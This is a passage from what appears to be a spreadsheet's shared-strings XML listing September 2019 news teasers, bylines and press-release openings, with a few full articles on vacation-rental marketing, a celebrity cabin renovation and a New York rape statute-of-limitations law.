    <t>20 mins ago in Sports</t>
  </si>
  <si>
    <t>Posted by Mike Florio</t>
  </si>
  <si>
    <t>Getty Images Regardless of the Patriots’ decision to cut Antonio Brown, the NFL still has jurisdiction over multiple incidents that...</t>
  </si>
  <si>
    <t>All the coaches have been named for the inaugural edition of The Hundred, an eight-team competition spread across five weeks that is set to...</t>
  </si>
  <si>
    <t>AUSTRALIA'S national crop has come under siege, with a horror September in Western Australia in particular putting forecast yields in...</t>
  </si>
  <si>
    <t>VANCOUVER, Sept. 3, 2019 /CNW/ - Trading resumes in: Company: Abigail Capital Corporation TSX-Venture Symbol: ACC.P Resumption (ET): 9:30...</t>
  </si>
  <si>
    <t>By David R Baker and Millicent Dent</t>
  </si>
  <si>
    <t>People love renewable power projects. Just not the one next door. Tourists look out from a beach at the GE-Alstom Block Island Wind...</t>
  </si>
  <si>
    <t>UPDATE: 4 p.m. Eastern time U.S. Coast Guard officials say they have rescued three of four crew members from an overturned cargo ship off...</t>
  </si>
  <si>
    <t>NEW YORK (AP) — The Latest on the U.S. Open tennis tournament (all times local): 5:15 p.m. Coco Gauff is back in the win column at the...</t>
  </si>
  <si>
    <t>Today is Saturday, Sept. 7, the 250th day of 2019. There are 115 days left in the year. Today’s Highlight in History: On Sept. 7, 1977, the...</t>
  </si>
  <si>
    <t>It’s quick and cheap, and when something goes wrong the employer hides behind it.</t>
  </si>
  <si>
    <t>Arlene Foster has ruled out standing as a candidate if a general election is called. The DUP leader is currently a Stormont MLA. Her...</t>
  </si>
  <si>
    <t>By ANNA HUNTSMAN and JAKE STEINBERG</t>
  </si>
  <si>
    <t>ELFIN FOREST, Calif. (AP) — Elfin Forest is named for the miniature trees that blanket the surrounding ridgeline. The terrain acts like a...</t>
  </si>
  <si>
    <t>CINCINNATI, Sept. 30, 2019 /PRNewswire-PRWeb/ -- iPatientCare, a pioneer in cloud-based ambulatory EHR, revenue cycle management services,...</t>
  </si>
  <si>
    <t>Sep, Sat 21 2019 - 6:00 PM to 9:00 PM</t>
  </si>
  <si>
    <t>AMARILLO, Texas (AP) — Police reports describe concerns eight years ago that the gunman who killed seven and wounded 25 last month in West...</t>
  </si>
  <si>
    <t>522 Productions is proud to announce Free the Slaves as the winner of the nonprofit video contest, launched in July 2019. 522 Productions...</t>
  </si>
  <si>
    <t>KEVIN FREKING</t>
  </si>
  <si>
    <t>A US federal agency, buffeted by strong winds of presidential outrage, has put out a new statement on whether Donald Trump was wrong to...</t>
  </si>
  <si>
    <t>Surrey, British Columbia, Sept. 26, 2019 (GLOBE NEWSWIRE) -- DSG GLOBAL INC. (DSGT), the world's leading provider of the patented GPS Golf...</t>
  </si>
  <si>
    <t>MIAMI, Sept. 6, 2019 /PRNewswire-PRWeb/ -- Laurence Fishburne, TV and movie star, also serves as host of a unique and well-regarded...</t>
  </si>
  <si>
    <t>Dream Cloud launched a new hybrid matters featuring high-quality memory foam and advanced tufting coil technology for a comfortable,...</t>
  </si>
  <si>
    <t>0 comment The Queen’s personal adviser and confidante Angela Kelly has written a book about her close working relationship with the...</t>
  </si>
  <si>
    <t>Mumbai, Sep 12 (IANS) Phillip Zimmerman, technical development services programme manager, and Roma Khanna, tournament director, FIFA U-17...</t>
  </si>
  <si>
    <t>Forrester</t>
  </si>
  <si>
    <t>Google and Facebook have dominated the digital advertising landscape for much of this decade.</t>
  </si>
  <si>
    <t>GENEVA (AP) — Paris Saint-Germain and Manchester City succeeded where storied rivals failed in their opening Champions League games. Even...</t>
  </si>
  <si>
    <t>shanigaram karthik</t>
  </si>
  <si>
    <t>Market Overview: Beetroot is also called as a red beet, golden beet, table beet, and garden beet. Beetroot is employed as a sweetening...</t>
  </si>
  <si>
    <t>MOSCOW, Idaho (AP) — Idaho authorities have arrested a former University of Idaho professor on drug possession and burglary charges after...</t>
  </si>
  <si>
    <t>TIM BOOTH AP Sports Writer</t>
  </si>
  <si>
    <t>SEATTLE (AP) — Tanner Roark seemed to describe perfectly the approach of the playoff-bound Oakland Athletics on the final day of the...</t>
  </si>
  <si>
    <t>AM Best has affirmed the Financial Strength Rating of B++ (Good), the Long-Term Issuer Credit Rating (Long-Term ICR) of “bbb+” and the...</t>
  </si>
  <si>
    <t>Robert F. Bukaty, Associated Press</t>
  </si>
  <si>
    <t>FARMINGTON, Maine (AP) — A powerful propane explosion leveled a recently opened nonprofit center after crews arrived to investigate the...</t>
  </si>
  <si>
    <t>Rockstar is releasing a line of 30 items inspired by Red Dead Redemption 2.</t>
  </si>
  <si>
    <t>By Marilyn Moritz - Reporter</t>
  </si>
  <si>
    <t>SAN ANTONIO - Grab-and-go snack bars for kids are convenient and can satisfy their munchies. But are they as healthy for your child as the...</t>
  </si>
  <si>
    <t>STAAH</t>
  </si>
  <si>
    <t>In the crowded market of vacation rentals, you want your property to stand out. The question is how? Well, creativity can never fail to attract guests and promoting it the right way can get you more bookings. Thanks to your hard work and keen eye for detail , you know that your vacation rental is among the pick of the crop. But how best to communicate this to potential guests? Read on for some tips shared by guest writer Cloe Matheson on how you can achieve this. 1 Provide free equipment for outdoor activities As well as relaxing, people love to get out and get active in the local area while on vacation. An investment in some sports equipment for your guests can be a perfect point of difference in your promotion. Free use of equipment such as bicycles, kayaks, or tennis racquets are all great perks for guests who book your property. Carving out a solid reputation for your vacation rental requires a little bit of thoughtful, savvy marketing. You want to make it as easy as possible for your guests to see the hard work you do to create an inviting environment where they can enjoy their time off. Introducing some creative marketing will be sure to increase bookings and create a buzz around your property. 2 Install modern bathroom fixtures, furniture, and décor Up the ante with stylish décor and bathroom fixtures. Investing in quality interior decorating throughout the whole rental property will help it to stand out from the crowd. List photos of a chic, sparkling bathroom, and tidy living areas with stylish furniture that pop off the webpage. Featuring these attractive spaces will make your guests take notice of what you have on offer. If you have an outdoor space, be sure to showcase the stylish outdoor furniture, guests are sure to enjoy. If the property has a great view of the outdoors, be sure to include a sneaky shot or two of the scenery too! 3 Feature guest reviews alongside photos By installing classy furniture and bathroom fittings, guests are likely to comment on their quality in their reviews. This lets you feature positive testimonials alongside pictures of your property. Doing so invites potential guests to imagine having similar positive experiences. It lets them see for themselves that other guests have appreciated the effort you make to keep your rental looking sharp. 4 Give local travel and money-saving tips Offering local knowledge in your rental marketing is a great way to attract guests. Got a favourite café for brunch nearby? Let your guests know how to get there and what the best dishes are. Know of a great Happy Hour or two-for-one dinner? Include these tips in your rental description. Advice on local attractions , nature walks , and activities are also great ideas to advertise alongside your rental. Prospective guests will appreciate these local insights and help them have a great experience at your property. 5 Offer discounts, giveaways, or free transfers Everyone loves a bargain. Offering discounts can be an effective way to increase bookings. You could offer special rates for multiple nights , booking at certain times of the year, or for people who have been referred by former guests. These are all ways you can make your rental more attractive. Another idea would be to offer a giveaway , such as the chance to win a bottle of wine or a voucher for local activities. Guests could be entered into the competition automatically by booking the rental for certain dates or for a certain number of nights. This is a fun way to incentivise guests to book with you. You could approach a local restaurant or bar and see if they would be willing to offer specials to your guests. This benefits both businesses as well as your guests – everyone wins! Finally, you could offer free transfers for guests arriving by plane, train, or bus. Offering to transfer your guests from their transport to the rental shows you are willing to go above and beyond to make their stay special. Follow these simple tips and watch the bookings flow in! You can manage your multiple vacation rentals through STAAH and can also track all your reviews on STAAH Reviewminder . This article has been supplied by guest writer Cloe Matheson . About Cloe Matheson Cloe Matheson is a New Zealand based freelance writer. She has a passion for home design, travel and adventure. You can find her writing about the latest trends in design while enjoying a cup of coffee.</t>
  </si>
  <si>
    <t>Dublin, Sept. 25, 2019 (GLOBE NEWSWIRE) -- The "Information Technology Global Market Forecast To 2022" report has been added to...</t>
  </si>
  <si>
    <t>MSNBC's Ari Melber explains how the Trump administration sided with payday lenders and hung consumers out to dry.</t>
  </si>
  <si>
    <t>24/7 News Source</t>
  </si>
  <si>
    <t>The parent company of the Philadelphia Flyers has spent the weeks leading up to the season unveiling the team's best offseason...</t>
  </si>
  <si>
    <t>This September, PHP Agency, Inc. ("PHP") will be sponsoring the 2nd Annual Gold Gala Auction and Dinner for Layla’s Legacy, a charity...</t>
  </si>
  <si>
    <t>HAUPPAUGE, N.Y., Sept. 3, 2019 /PRNewswire/ -- A home doesn't feel complete until a pool is installed. A pool promotes relaxation, family...</t>
  </si>
  <si>
    <t>Australia won't be getting a long term plan to cut its emissions any time soon. United Nations Secretary-General Antonio Guterres has...</t>
  </si>
  <si>
    <t>MARCUS HAYES</t>
  </si>
  <si>
    <t>By MARCUS HAYES The Philadelphia Inquirer No Shady. No Clowney. No mercy. Every cutdown day is a gamble. Players are released. Deals are...</t>
  </si>
  <si>
    <t>by Jack McKay</t>
  </si>
  <si>
    <t>LORD Mayor Adrian Schrinner has cracked down on councillor taxi privileges, after his own party charged ratepayers thousands of dollars for...</t>
  </si>
  <si>
    <t>Russia Bear 3X Direxion (RUSS) shares have seen the Money Flow Indicator drop below 30, potentially spelling a near-term reversal if it...</t>
  </si>
  <si>
    <t>Highlights from the girl’s soccer match featuring Memorial vs. Central.</t>
  </si>
  <si>
    <t>PIERREFONDS, Quebec — 21-year-old CEO Ambro Di Pilato founded the Stratton Sales Agency 10 months ago and under his leadership, the agency...</t>
  </si>
  <si>
    <t>TEHRAN (FNA)- Iranian Minister of Science, Research and Technology Mansour Gholami announced that his country ranked 16th in the world in...</t>
  </si>
  <si>
    <t>The number of patients and services claimed is also on the rise, AIHW data shows</t>
  </si>
  <si>
    <t>Friends guest star Bonnie Somerville has revealed that her storyline during the soap's eighth season was never supposed to happen. Bonnie...</t>
  </si>
  <si>
    <t>Daniel Binns</t>
  </si>
  <si>
    <t>BORIS JOHNSON’s Brexit trip to Luxembourg ended in acrimony when he pulled out of a joint press conference to avoid a heckling mob of...</t>
  </si>
  <si>
    <t>By Rachel Silberstein</t>
  </si>
  <si>
    <t>ALBANY⁠ — Glenmont Elementary School is among 13 schools in the state, and the only one in the Capital Region, to be named a 2019 National...</t>
  </si>
  <si>
    <t>Mayors rule out Prince of Wales Bridge for transit connect CBC.ca The Prince of Wales Bridge will never carry develops again, the mayors...</t>
  </si>
  <si>
    <t>The Australian All Ords fell 32.10 points or 0.47% to 6,728.00.</t>
  </si>
  <si>
    <t>NEW YORK, New York - U.S. stocks were little changed on Wednesday with concern over the direction of the Chinese economy and the impact it...</t>
  </si>
  <si>
    <t>A disqualified driver who allegedly struck and killed a 12-year-old schoolboy crossing a Sydney road has been formally refused bail. Rabih...</t>
  </si>
  <si>
    <t>If Zosia Mamet and Evan Jonigkeit ever tire of the Hollywood life, they’re ready for a second career as home-renovation stars. The actress, 31, best known for playing Shoshanna Shapiro on Girls, and her husband, 36, a fellow actor who had a villainous turn in X-Men: Days of Future Past, are admitted HGTV junkies. So when they bought a 1920s log cabin an hour north of New York City in 2014, they were looking forward to overhauling it. “It was a rugged sort of camping experience,” Jonigkeit jokes of the renovation, which he tackled with the help of a handy friend. “We were sleeping on plywood subfloors. We didn’t have electricity for a period.” RELATED: Lena Dunham Reveals Why Her ‘Eccentric’ NYC Apartment Makes Her Feel Like ‘I’m Finally Home’ His proudest accomplishment however, would likely go unnoticed by anyone not intimately familiar with restoring a 100-year-old log home. “I had to go and do this very time consuming almost sculpting of this material called chinking that goes between the logs.” The process took the two friends nearly two weeks, but it was worth it, he says. “The chinking is beautiful. Oh my god, let me tell you,” he says with a laugh. “He’s so proud,” adds Mamet, who for her part, skipped out on the more rustic bits of the makeover. “Moose and I stayed in the city for that portion,” she notes of herself and the couple’s rescue dog. After a yearlong remodel that involved removing several interior log walls to create an open-concept kitchen, and some help from design firm High Street Homes, the couple finally got to decorate their dream house. They teamed up with West Elm to outfit the place for cozy getaways and big family gatherings. (Shop all their favorite West Elm pieces here.) “The rustic elements of the original structure, we didn’t really want to mess with. We wanted to keep its integrity as much as possible,” says Mamet. “But it was also important to us to bring some modern elements into the house and kind of make it our own.” They chose Midcentury-inspired pieces, like the pale pink Roar + Rabbit swivel chair in their master bedroom; more woodsy ones, including their slab dining table; and even a few vintage-industrial touches, like thebar stools at their new kitchen island. RELATED: Inside Charli XCX’s ‘a Little Creepy and Weird’ Hollywood Home: ‘It Felt Really Right for Me’ Now, they’re just looking forward to sharing the “after.” “We wanted a place that would be a haven for us and the people we love,” Mamet says. “We open it up to all of our friends and family. Evan’s dad goes and fishes in our lake. Our friends go when we’re not there. Having it not be just a home to us, but also to the people we love, that’s what makes it feel like home.”</t>
  </si>
  <si>
    <t>— Joe Kernen (@JoeSquawk) September 5, 2019 Kernen additionally challenged Mobius on why he didn’t specific the similar sentiment towards...</t>
  </si>
  <si>
    <t>Executive Summary A comprehensive research report created through extensive primary research (inputs from industry experts, companies,...</t>
  </si>
  <si>
    <t>By JILL LAWLESS and GREGORY KATZ Associated Press</t>
  </si>
  <si>
    <t>LONDON (AP) — Prime Minister Boris Johnson accused Britain's main opposition leader on Thursday of trying to dodge an election, after...</t>
  </si>
  <si>
    <t>Kate Sullivan and Eric Bradner, CNN</t>
  </si>
  <si>
    <t>Comments come after string of mass shootings</t>
  </si>
  <si>
    <t>Paul Friesen                        More from Paul Friesen</t>
  </si>
  <si>
    <t>The Winnipeg Jets cut down their training camp roster by 13 players today, none of them a surprise. Going to AHL training camp for the...</t>
  </si>
  <si>
    <t>Dominica Sanda</t>
  </si>
  <si>
    <t>Sydney's controversial lockout laws could be scrapped for most of the CBD with the NSW premier hoping the move will enhance the city's...</t>
  </si>
  <si>
    <t>Natalie Wolfe, news.com.au</t>
  </si>
  <si>
    <t>A British man will face court today charged with a raft of offences, a day after he was dramatically arrested at Brisbane Airport allegedly...</t>
  </si>
  <si>
    <t>By Tom Seaward</t>
  </si>
  <si>
    <t>AS the case against Christopher Halliwell for the murder of Becky Godden-Edwards crumbled, the police officer who had secured a confession...</t>
  </si>
  <si>
    <t>John Tozzi, Bloomberg</t>
  </si>
  <si>
    <t>Senior citizens who try to fill prescriptions have them rejected at the pharmacy counter millions of times each year because their doctors...</t>
  </si>
  <si>
    <t>PETERBOROUGH, N.H., Sept. 10, 2019 /PRNewswire/ -- SoClean, the creator of the world's first automated CPAP cleaner and sanitizer,...</t>
  </si>
  <si>
    <t>Wall Street brokerages expect Nutrien Ltd (NYSE:NTR) to report earnings of $0.48 per share for the current quarter, Zacks Investment...</t>
  </si>
  <si>
    <t>SAN DIEGO, Calif., Sep 12, 2019 (SEND2PRESS NEWSWIRE) -- The Belize Tourism Board recently released its January - June 2019 Tourism...</t>
  </si>
  <si>
    <t>YolandaBlack</t>
  </si>
  <si>
    <t>When we read the Bible we hear from God. We recieve a deeper understanding of who God is when we read the Bible. Let us open the book and...</t>
  </si>
  <si>
    <t>Avery Ellfeldt</t>
  </si>
  <si>
    <t>For Arizona Diamondbacks fans who like to stick to the basics at home games, peanuts, popcorn, and Cracker Jack remain obvious options. But...</t>
  </si>
  <si>
    <t>STAFF WRITERS, Townsville Bulletin</t>
  </si>
  <si>
    <t>St Clare’s Catholic School has been placed into lockdown after reports a man was headed towards the school armed with a weapon. Initial...</t>
  </si>
  <si>
    <t>LOUISVILLE, Ky., Sept. 25, 2019 /PRNewswire/ -- ORR Safety Corporation, a subsidiary of ORR Corporation, announced it has entered into an...</t>
  </si>
  <si>
    <t>MRFR offers a Phenomenal Analysis of Global Coronary Pressure Monitor Market by Segmentation, Regional Analysis, Top Companies, Scope, and...</t>
  </si>
  <si>
    <t>A Tunisian national guard chief and three extremists were killed in a clash on the first day of the country’s presidential campaign,...</t>
  </si>
  <si>
    <t>By DAVID BAUDER</t>
  </si>
  <si>
    <t>People eat and watch football at a Buffalo Wild Wings, Thursday, Sept. 5, 2019, in Las Vegas. MGM Resorts International and Buffalo Wild...</t>
  </si>
  <si>
    <t>What to expect from the weather this week in the Verona-Cedar Grove area.</t>
  </si>
  <si>
    <t>By Rachel Russell</t>
  </si>
  <si>
    <t>PRINCE HARRY joined a team of celebrities to help raise money for different charities on the 18th anniversary of the September 11 terror...</t>
  </si>
  <si>
    <t>What will the Colorado Rockies do at first base in 2020? | Rox Pile First base has been a tricky spot to fill for a while for the Rockies,...</t>
  </si>
  <si>
    <t>CRANFORD, N.J., Sept. 4, 2019 /PRNewswire/ -- Citius Pharmaceuticals, Inc. ("Citius") ("Company") (NASDAQ: CTXR), a specialty...</t>
  </si>
  <si>
    <t>ChildCare Education Institute® (CCEI), an online child care training provider dedicated exclusively to the early care and education...</t>
  </si>
  <si>
    <t>By Andrew Marchand</t>
  </si>
  <si>
    <t>The Islanders will have a new radio home, while ESPN New York has begun programming 1050 AM. The team and the station have agreed to a...</t>
  </si>
  <si>
    <t>Xylem Inc. (NYSE: XYL), a leading global water technology company dedicated to solving the world’s most challenging water issues, announced...</t>
  </si>
  <si>
    <t>The Arizona Wildcats ought to be feeling pretty good about themselves entering their Pac-12 opener against UCLA. The UA is coming off its...</t>
  </si>
  <si>
    <t>Ant Sharwood</t>
  </si>
  <si>
    <t>It's AFL Grand Final week, but in the heart of Giants territory, you wouldn't know it.</t>
  </si>
  <si>
    <t>Angus Livingston</t>
  </si>
  <si>
    <t>Planned legislation to create a national anti-corruption watchdog will be finalised by the end of the year, 12 months after it was first...</t>
  </si>
  <si>
    <t>Michael Saponara</t>
  </si>
  <si>
    <t>In the midst of a legal battle that has him facing multiple felonies, Lil Durk hasn't been able to speak out or do much press in support of...</t>
  </si>
  <si>
    <t>Watch CBSN Live Copyright © 2019 CBS Interactive Inc. All rights reserved. .device-is–iphone .component–view-bulk-component .container,...</t>
  </si>
  <si>
    <t>DUBLIN, Sept. 11, 2019 /PRNewswire/ -- The "Ophthalmic Devices Global Market Forecast To 2022" report has been added to...</t>
  </si>
  <si>
    <t>ST. LOUIS (AP) — Cincinnati Reds third baseman Eugenio Suarez left the second game of a doubleheader against the St. Louis Cardinals after...</t>
  </si>
  <si>
    <t>Gigstreem (formerly Rainbow Broadband), a Tysons, Virginia-based internet service provider targeting residential and commercial customers,...</t>
  </si>
  <si>
    <t>China to firmly implement Paris Agreement Beijing, Sep 26 (IANS) China will continue, as always, to firmly implement the Paris Agreement,...</t>
  </si>
  <si>
    <t>Tri-Continental Co. (NYSE:TY) announced a quarterly dividend on Friday, September 6th, NASDAQ reports. Shareholders of record on Wednesday,...</t>
  </si>
  <si>
    <t>PUNE, INDIA, September 27, 2019 /EINPresswire.com/ -- Overview: With the growing awareness regarding fitness and detection and prevention...</t>
  </si>
  <si>
    <t>ORLANDO, Fla., Sept. 23, 2019 /PRNewswire-PRWeb/ -- Meridian Senior Living, LLC (Meridian) is pleased to announce the addition of Gentry...</t>
  </si>
  <si>
    <t>By Dr. Gary Kracoff and John Walczyk, Daily News Correspondents</t>
  </si>
  <si>
    <t>Admit it, guys. We have a hard time talking about stuff that goes on below the belt. That’s why we joked about anatomy when we were teens...</t>
  </si>
  <si>
    <t>Meteoric-rising Canadian tennis star Bianca Andreescu is savouring her historic win at the U.S. Open — beating her idol, the legendary...</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.91 in Q1 2019. Its up 0.18, from 1.73 in 2018Q4. It is positive, as 17 investors sold SKY shares while...</t>
  </si>
  <si>
    <t>Construction boss John Setka is under mounting pressure to resign, as the Senate prepares to scrutinise draft laws to ban union officials...</t>
  </si>
  <si>
    <t>RALEIGH, N.C. — The Carolina Hurricanes have signed former Toronto defenceman Jake Gardiner to a four-year contract. Under terms of the...</t>
  </si>
  <si>
    <t>Coach Mike Leach makes his return to the Lone Star State when No. 20 Washington State travels to Houston, where protege Dana Holgorsen...</t>
  </si>
  <si>
    <t>In Chicago, for decades now, when the offense struggles all arrows have been aimed at the quarterback, and Mitch Trubisky in particular is...</t>
  </si>
  <si>
    <t>September 10, 2019 (If you appreciate stories like this, please consider donating to ANP to help keep us in this battle for the future...</t>
  </si>
  <si>
    <t>Below is a list of the top and leading Stadiums in Newcastle. To help you find the best Stadiums located near you in Newcastle, we put...</t>
  </si>
  <si>
    <t>Submitted by Simran Khatija</t>
  </si>
  <si>
    <t>The Insight Partners adds ‘Ultrasound Market’ to its store, which furnishes a skillful and deep study of crucial business trends and...</t>
  </si>
  <si>
    <t>COVINGTON, La., Sept. 03, 2019 (GLOBE NEWSWIRE) -- Pool Corporation (NASDAQ:POOL) announced today that Mark W. Joslin, Senior Vice...</t>
  </si>
  <si>
    <t>Pope Francis has denounced “the culture of comfort”, which he says leads to indifference in the face of a global migration and refugee...</t>
  </si>
  <si>
    <t>Jenny Moody</t>
  </si>
  <si>
    <t>Two vehicles were involved in the crash An elderly woman needed treatment after a car accident in Swadlincote. She was injured after an...</t>
  </si>
  <si>
    <t>Li Qian</t>
  </si>
  <si>
    <t>In downtown Jing’an District, you could be anywhere in the world. You can start your day with a cup of coffee at Starbucks’ Reserve...</t>
  </si>
  <si>
    <t>WATCH ABOVE as video captures the hail of bullets in Mississauga Saturday that left one teen dead and 5 people injured. What do YOU think?...</t>
  </si>
  <si>
    <t>By Chris LisinskiSTATE HOUSE NEWS SERVICE</t>
  </si>
  <si>
    <t>QUINCY, SEPT. 30, 2019.....Three vape shops sued the Baker administration Sunday over the state's emergency four-month ban on sales of...</t>
  </si>
  <si>
    <t>AP Education Writer</t>
  </si>
  <si>
    <t>The Trump administration is threatening to cut a grant for a Middle East studies program run by the University of North Carolina and Duke...</t>
  </si>
  <si>
    <t>ATLANTA, Sept. 12, 2019 /PRNewswire/ --The Michelson Institute for Intellectual Property (Michelson IP) is proud to announce a partnership...</t>
  </si>
  <si>
    <t>There has been a significant increase in the number of older people seeking help for homelessness since 2012-13, new figures show. In...</t>
  </si>
  <si>
    <t>The car industry was given a huge boost on Wednesday with news of hundreds of jobs to build a new 4×4 vehicle. Ineos Automotive announced...</t>
  </si>
  <si>
    <t>Karen Matthews</t>
  </si>
  <si>
    <t>New York Gov. Andrew Cuomo signed legislation Wednesday to make it easier to prosecute some sex crimes by extending the statute of limitations for second- and third-degree rape. The Democratic governor was joined by actresses Mira Sorvino and Julianne Moore as well as activists from the group Time's Up as he signed the measure at his Manhattan office. "Rape and sexual assault are much more common and frequent than we admit," Cuomo said. "You will never solve a problem in life that you are unwilling to admit and denial is not a life strategy. We have denied this for too long." The new law extends the statute of limitations from five years to 20 years for second-degree rape and from five years to 10 years for third-degree rape. Second- and third-degree rape can be charged under New York law when a victim cannot consent to sex either because of age or incapacity. "The law said a victim of rape has to bring their claim in five years or they lose their right," Cuomo said. "Five years is a terribly short period of time if you have any appreciation for what the person went through." Sorvino, who was one of producer Harvey Weinstein's early accusers and who has said she is a survivor of date rape by another man whom she did not identify, said every time someone stands up to "rape culture" it means "we stand up for all of us." "There is a hunger out there for justice," Sorvino said, "and we are here to tell all of you who feel that hunger that we are getting closer to that day when predators will not abuse unabated in an atmosphere of impunity." Michelle Hurd, a leader of Time's Up and an actress known for her role on the TV series "Law and Order: Special Victims Unit," said that the vast majority of rapes are second- and third-degree rapes. "In the aftermath of an assault so many survivors are afraid to come forward," Hurd said. "If and when they do decide to seek justice, frequently they find the law doesn't allow them to hold their attackers accountable. But not any more." She added: "No longer will New York state have an unjust expiration date on justice for survivors of rape." The new law also extends the statute of limitations to 20 years for a criminal sexual act in the second degree and incest in the second degree, and to 10 years for a criminal sexual act in the third degree. It eliminates the statute of limitations for incest in the first degree and increases the time period in which victims can bring a civil suit for these offences to 20 years. "As we started our meetings we talked about what we could do to change policy in New York," said Moore, who said she was attending the news conference as a member of Time's Up, the gender equality initiative formed in response to sexual misconduct allegations in Hollywood, including against Weinstein. Weinstein is scheduled to go to trial in January on charges alleging he raped an unidentified woman in his Manhattan hotel room in 2013 and performed a forcible sex act on a different woman in 2006. He denies all accusations of non-consensual sex.</t>
  </si>
  <si>
    <t>Watch #RamCharan Making Hilarious Fun With #SurenderReddy #SyeRaa Trailer Launch Event Please Subscribe us : https://goo.gl/N1GMjx For more...</t>
  </si>
  <si>
    <t>The banking regulator was prepared to work in secret with the banks to gain their co-operation, the head of a federal review says. Graeme...</t>
  </si>
  <si>
    <t>SAN FRANCISCO (AP) — The woman who was sexually assaulted in 2015 on the campus of Stanford University by a college swimmer and read a...</t>
  </si>
  <si>
    <t>It wasn’t easy because of the major workload — the Nebraska defense had to defend a season-high 81 offensive plays — but the Blackshirts...</t>
  </si>
  <si>
    <t>By ERIC TUCKER Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON (AP) — A prominent Washington lawyer was found not guilty Wednesday of lying to the Justice Department about work he did for the...</t>
  </si>
  <si>
    <t>Sept 25 (Reuters) - Tottenham Hotspur's unsettled squad must make up for time lost in pre-season and build togetherness to arrest a slump...</t>
  </si>
  <si>
    <t>Samantha McDaniel-Ogletreesmcdaniel@myjournalcourier.com, smcdaniel@civitasmedia.com</t>
  </si>
  <si>
    <t>Photos from the Routt versus Mendon Unity football game.</t>
  </si>
  <si>
    <t>Benita Kolovos</t>
  </si>
  <si>
    <t>Purple reigned supreme on the Brownlow Medal red carpet, with the wives and girlfriends of the AFL stepping out at Melbourne's Crown Casino...</t>
  </si>
  <si>
    <t>MIAMI (AP) — The Latest on hurricanes and tropical storms in the Eastern Pacific and Atlantic (all times local): 12:30 p.m. Bermuda's...</t>
  </si>
  <si>
    <t>The Canadian Press  More from The Canadian Press</t>
  </si>
  <si>
    <t>By Jordan Press OTTAWA — Health Canada is hoping to use private-sector dollars to fight opioid addiction because “conventional efforts...</t>
  </si>
  <si>
    <t>NEW YORK, NY / ACCESSWIRE / September 25, 2019 / Endava Plc Sponsored ADR Class A (NYSE: DAVA) will be discussing their earnings results in...</t>
  </si>
  <si>
    <t>ANN ARBOR, MI / ACCESSWIRE / September 3, 2019 / University Bancorp, Inc. (OTCQB:UNIB) announced that it had an unaudited net income...</t>
  </si>
  <si>
    <t>A WOMAN motorcyclist involved in a crash in Halesowen has died, police confirmed. The 24-year-old woman had been fighting for her life...</t>
  </si>
  <si>
    <t>CLEVELAND (AP) — The NFL told the Browns that star Odell Beckham Jr. can no longer wear watches during a game. The flashy wide receiver...</t>
  </si>
  <si>
    <t>The stock of DENA CO LTD TOKYO ORDINARY SHARES JAPAN (OTCMKTS:DNACF) registered a decrease of 0.44% in short interest. DNACF’s total short...</t>
  </si>
  <si>
    <t>(Marijan Murat/dpa via AP). FILE - In this March 2, 2018 file photo, a worker cleans big machine parts of presses manufacturer Schüler AG...</t>
  </si>
  <si>
    <t>Katie Greathouse</t>
  </si>
  <si>
    <t>CAMDENTON, Mo. - The Camdenton Police Department is investigating after officers found what appeared to be an "explosive substance" inside...</t>
  </si>
  <si>
    <t>Investors sentiment increased to 1.33 in 2019 Q1. Its up 0.46, from 0.87 in 2018Q4. It is positive, as 20 investors sold BioMarin...</t>
  </si>
  <si>
    <t>BERLIN — Police in the eastern German city of Chemnitz say they’re investigating an attack on a wheelchair-bound Libyan migrant as a...</t>
  </si>
  <si>
    <t>Today, UBS Financial Services Inc. announced that James "Jim" Patrick and John D'Amico have joined UBS as Financial Advisors in the firm's...</t>
  </si>
  <si>
    <t>TORONTO, Sept. 4, 2019 /CNW/ - PayBright, a Canadian fintech lending and payments provider, announced today that it has raised $34 million...</t>
  </si>
  <si>
    <t>GENEVA, Sept 3 (Reuters) - Myanmar is holding insurgent suspects incommunicado in a practice that may be covering up torture, U.N. human...</t>
  </si>
  <si>
    <t>For half a dozen Russians, a 10-day trip to Spokane was intended primarily as a cultural exchange and fact-finding trip on parasports....</t>
  </si>
  <si>
    <t>Enhancements in digitization-driven connectivity have empowered the oil &amp; gas industry by providing unparalleled opportunities for value...</t>
  </si>
  <si>
    <t>Brad Bergholdt</t>
  </si>
  <si>
    <t>Q: I have a 2013 F-150 4x4 (bought new) with less than 19,000 miles. When I shift into 4-wheel drive under load, such as going up a steep...</t>
  </si>
  <si>
    <t>Christina Milian wants to marry her boyfriend Matt Pokora "someday". The 37-year-old singer is currently expecting a baby boy with her...</t>
  </si>
  <si>
    <t>Rebecca Le May</t>
  </si>
  <si>
    <t>A man fresh out of jail who killed a five-year-old boy when he crashed a stolen car into a family's stationary van has been jailed for...</t>
  </si>
  <si>
    <t>by Mary Clare Jalonick, The Associated Press</t>
  </si>
  <si>
    <t>WASHINGTON — The House Judiciary Committee is approaching its first impeachment-related vote, set to define procedures for upcoming...</t>
  </si>
  <si>
    <t>SACRAMENTO, Calif. -- Authorities say eight people were injured when two cars collided and then crashed into a corner restaurant in...</t>
  </si>
  <si>
    <t>Aerie Pharmaceuticals, Inc. (NASDAQ: AERI), an ophthalmic pharmaceutical company focused on the discovery, development and...</t>
  </si>
  <si>
    <t>By Rodney Woods</t>
  </si>
  <si>
    <t>State Member for Shepparton Suzanna Sheed has called on the Victorian Government to vigorously investigate claims made by Professor Peter...</t>
  </si>
  <si>
    <t>GATX Corporation (GATX - Free Report) is looking like an interesting pick from a technical perspective, as the company is seeing...</t>
  </si>
  <si>
    <t>STOCKTON, Calif., Sept. 6, 2019 /PRNewswire/ -- Transportation wholesale insurance brokerage Transatlantic Underwriters (TAU) announced...</t>
  </si>
  <si>
    <t>WASHINGTON, Sept. 23, 2019 /PRNewswire/ -- The Alliance to End Plastic Waste (AEPW) today announced a partnership with Project STOP to...</t>
  </si>
  <si>
    <t>(BPT) - With unemployment rates at a nearly 50-year low, many businesses are struggling to find workers. This tight job market is opening...</t>
  </si>
  <si>
    <t>VANCOUVER, BC / ACCESSWIRE / September 3, 2019 / MGX Renewables Inc. (“MGXR” or the “Company”) (CSE:MGXR)(FSE:0E9) is pleased to announce...</t>
  </si>
  <si>
    <t>Tickers: XTSX:EYC, PINX:EYCCF Tags: #Healthcare Vancouver, BC - TheNewswire - September 19, 2019- Eyecarrot Innovations Corp. (TSXV:EYC) is...</t>
  </si>
  <si>
    <t>Originally posted on https://www.workboard.com/blog/what-makes-a-great-boss.php What do the US, Canada and Lithuania have in common? We...</t>
  </si>
  <si>
